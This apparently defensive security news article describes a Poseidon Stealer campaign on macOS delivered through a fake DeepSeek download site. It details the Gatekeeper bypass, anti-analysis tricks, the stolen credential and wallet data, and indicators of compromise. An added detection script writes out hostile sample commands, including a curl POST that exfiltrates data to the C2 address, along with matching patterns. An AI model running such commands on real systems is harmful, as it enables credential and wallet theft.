April 24, 2025

Poseidon Stealer Malware Attacking Mac Users via Fake DeepSeek Site

Cybersecurity researchers uncovered a sophisticated macOS malware campaign distributing the Poseidon Stealer through a counterfeit DeepSeek AI platform website. 

This malware-as-a-service (MaaS) operation employs advanced social engineering tactics combined with anti-analysis techniques to compromise sensitive user data, marking a significant escalation in macOS-targeted threats.

The attack chain begins with malvertising campaigns redirecting users to deepseek.exploreio[.]net, a domain hosting a near-perfect replica of the legitimate DeepSeek AI interface. 

Upon clicking “Download for Mac OS,” victims receive a DMG file named DeepSeek_v.[0-9].[0-9]{02}.dmg from the compromised domain manyanshe[.]com.

Fake DeepSeek site

The mounted DMG contains a malicious shell script masquerading as an application bundle:

This multi-stage payload leverages osascript to execute AppleScript commands that bypass macOS Gatekeeper protections by forcing execution through Terminal. 

The script copies a binary named .DeepSeek to /tmp, clears extended attributes with xattr -c, and marks it executable via chmod +x.

Anti-Analysis and Evasion Techniques

Poseidon Stealer implements layered anti-debugging measures: alongside the ptrace()-based check, a secondary check uses sysctl to inspect the P_TRACED flag in the process status.

Anti-debug via ptrace()

The malware terminates if usernames match common researcher aliases like “maria” or “jackiemac” through AppleScript validation. 

Post-execution, it runs disown; pkill Terminal to detach from the parent process and remove forensic artifacts.

Data Exfiltration Mechanisms

Poseidon harvests:

  • Chromium/Firefox credentials (cookies, passwords, credit cards)
  • Cryptocurrency wallet data from 127 targeted extensions including MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn) and Coinbase Wallet (hnfanknocfeofbddgcijnmhnfnkdnaad)
  • System keychain databases (/Library/Keychains/login.keychain-db)
  • Documents matching *.txt, *.pdf, *.wallet extensions

Harvested files ready for exfil

According to the report, a forged password dialog validates credentials before the stolen data is zipped. Exfiltration occurs via curl POST requests to the C2 at 82.115.223[.]9/contact.

Mitigation Strategies

eSentire’s TRU team recommends:

  • Restricting osascript execution through MDM policies
  • Implementing NGAV solutions to detect and contain threats
  • User education on Terminal-based execution risks
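As an added illustration (not code from eSentire or the article), the observable steps described above can be expressed as a small multi-stage detection over process events, alerting only when several distinct stages appear together. The event records are constructed samples, and the field layout, rule names and threshold are assumptions.

```python
"""Flag the Poseidon-style chain (osascript -> Terminal, xattr -c / chmod +x on a
hidden /tmp binary, disown; pkill Terminal, curl POST to /contact) in process events."""
import re

# Constructed sample events: (parent_process, process, command_line). Not real telemetry.
SAMPLE_EVENTS = [
    ("Finder", "bash", "/Volumes/DeepSeek/DeepSeek.app/Contents/MacOS/DeepSeek"),
    ("bash", "osascript",
     "osascript -e 'tell application \"Terminal\" to do script \"/tmp/.DeepSeek\"'"),
    ("bash", "xattr", "xattr -c /tmp/.DeepSeek"),
    ("bash", "chmod", "chmod +x /tmp/.DeepSeek"),
    ("Terminal", "bash", "disown; pkill Terminal"),
    ("/tmp/.DeepSeek", "curl",
     "curl -X POST -F data=@/tmp/out.zip http://82.115.223[.]9/contact"),
    ("launchd", "Safari", "/Applications/Safari.app/Contents/MacOS/Safari"),
]

# One rule per stage of the chain reported above (rule names are assumptions).
RULES = [
    ("osascript_terminal", re.compile(r"\bosascript\b.*\bTerminal\b")),
    ("xattr_clear_tmp_hidden", re.compile(r"\bxattr\s+-c\s+/tmp/\.\S+")),
    ("chmod_exec_tmp_hidden", re.compile(r"\bchmod\s+\+x\s+/tmp/\.\S+")),
    ("detach_and_kill_terminal", re.compile(r"\bdisown\b.*\bpkill\s+Terminal\b")),
    ("curl_post_contact", re.compile(r"\bcurl\b.*(?:-X\s*POST|-F|-d)\b.*/contact\b")),
]


def match_rules(cmdline: str) -> list[str]:
    """Return the names of every stage rule that matches a single command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def score_events(events) -> dict[str, list[str]]:
    """Map each matched stage to the parent->process pairs that triggered it."""
    hits: dict[str, list[str]] = {}
    for parent, proc, cmd in events:
        for name in match_rules(cmd):
            hits.setdefault(name, []).append(f"{parent} -> {proc}")
    return hits


def is_poseidon_like(events, threshold: int = 3) -> bool:
    """Alert when at least `threshold` distinct stages co-occur; a lone
    `xattr -c` or `chmod +x` is common on developer machines and should not alert."""
    return len(score_events(events)) >= threshold


if __name__ == "__main__":
    for stage, procs in score_events(SAMPLE_EVENTS).items():
        print(f"{stage:28s} {procs}")
    print("alert:", is_poseidon_like(SAMPLE_EVENTS))
```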

This campaign demonstrates attackers’ growing sophistication in bypassing macOS security controls. 

The combination of social engineering, multi-stage payloads, and extensive data harvesting capabilities positions Poseidon Stealer as a critical threat to organizational and individual macOS users alike.

eSentire confirms active containment of infections across multiple enterprise networks, with ongoing monitoring for related IoCs.


The post Poseidon Stealer Malware Attacking Mac Users via Fake DeepSeek Site appeared first on Cyber Security News.
